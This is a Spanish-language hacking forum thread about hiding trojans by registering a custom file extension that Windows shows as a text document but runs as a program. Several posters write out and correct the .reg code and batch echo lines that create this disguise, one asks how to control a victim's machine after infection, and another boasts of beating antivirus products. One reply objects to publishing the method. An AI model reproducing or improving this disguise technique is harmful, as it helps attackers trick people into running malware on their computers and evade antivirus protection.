Autor
|
Tema: Ocultación de troyanos (Leído 56,750 veces)
|
|
valerossy46
|
tengo un serio problema. he exo to lo q aqui se explica, sin nigun tipo de problema con los ejecutables normales (los d programas, como x ejemplo los clientes), pero si con los servidores, me hace algo muy extraño, es como si al ejecutarlo (q no lo ejecuta) descomprime una copia en el mismo directorio con la extension q yo le haya puesto. necesito ayuda ya no tengo ni idea de x q puede ser. muxas gracias.
|
|
|
|
|
|
|
PxM
[PxM]
|
Pero es que no entiendo.... leo y leo el post y comprendo que es necesario contaminar el sistema... si, pero para contaminarlo se necesita un ejecutable o hacerlo a mano, (como ejecutable tomo también a .bat y .reg), ésto ya lo había pensado pero por lo mismo lo descarté... éso de las extensiones del registro modificadas para reconocer una extención "x" como ejecutable no puede ser sin que antes se haya "contaminado"... Pero ¡Si se contamina con un ejecutable!... que sería lo mismo que mandar el troyanito en exe... ¿no?
...
Lo de que cambies la extensión del troyano no tiene efecto en el antivirus al parecer ya que lo scannea igual.
|
|
|
|
|
|
|
Zorrohack
Quisiera burlar la enfermedad asi como a los AVs
|
oye Brujo y Creature hay una parte del codigo .reg que esta mal es donde dice: REGEDIT4 [HKEY_CLASSES_ROOT\.troj] @="trojfile" [HKEY_CLASSES_ROOT\trojfile] @="Documento de texto" "NeverShowExt"="" [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command] @=""%1" %*" esta parte del @=""%1" %*" esta mal ya que ese ese no es el valor que se debe escribir para que sea ejecutable,se debe escribir asi: @="\"%1\" %*" asi es que se escribira el valor para que se ejecute noten que si lo hacen de la otra manera el troyano nunca se ejecutara Perdonen que corrija al ADM. ajajaja que facil !!!
|
|
|
|
Progresamos porque hay Millones de imbeciles, maldicion jodi a McAfee,Panda,Kav,Norton, perdonen solo practicaba.
|
|
|
|
Thehacky
|
;)Oye Brujo encontre una manera de no tener que poner en hexadecimal esta parte:
@echo @=""%1" %*">>%TEMP%\troj.reg
solo pon lo siguiente:
@echo @="%%%11">>%TEMP%\-.reg
Ni tampoco esto:
@echo @="%SystemRoot%\system32\shell32.dll,-152">>%TEMP%\troj.reg
En vez de eso pon:
@echo @="shell32.dll,-152">>%TEMP%\-.reg
|
|
|
|
|
|
|
Thehacky
|
¿Quién ese estupido Anarko? Oye amigo conozco novatos pero tu te pasas!!!!!!!! Que tonto!!!
|
|
|
|
|
|
|
yhosi
|
brujo!!!! decime una cosa, despues que mi troyano ya infecto la maquina de la victima, como hago para usarlo?
|
|
|
|
|
|
|
-_-[S@BuEsOhAcK]-_-
No tenes nada mas interesante que leer que esto?
|
como uso el troyan??? dios mio... en que se ha convertido este foro.... brujo sinceramente no veo cual es la necesidad de publicar un texto asi, si sabes muy bien que clase de personas lo van a leer y que clase de uso le van a dar.. despues se quejan la mala fama que tienen lo hackers en la comunidad (Que los confunden que lammers o como sea que les digan), si seguimos asi no llegamos a ningun lado
|
|
|
|
uh ah.. pone a franchela..
xD
|
|
|
byebye
|
tu no sabes el dicho "toda informacion es poca"?, es como todo, el texto esta como informacion y para el que le interese. si sabes la forma que tienen de ocultarlos sabras como detectarlos ¿no crees?.
|
|
|
|
|
|
|
|
|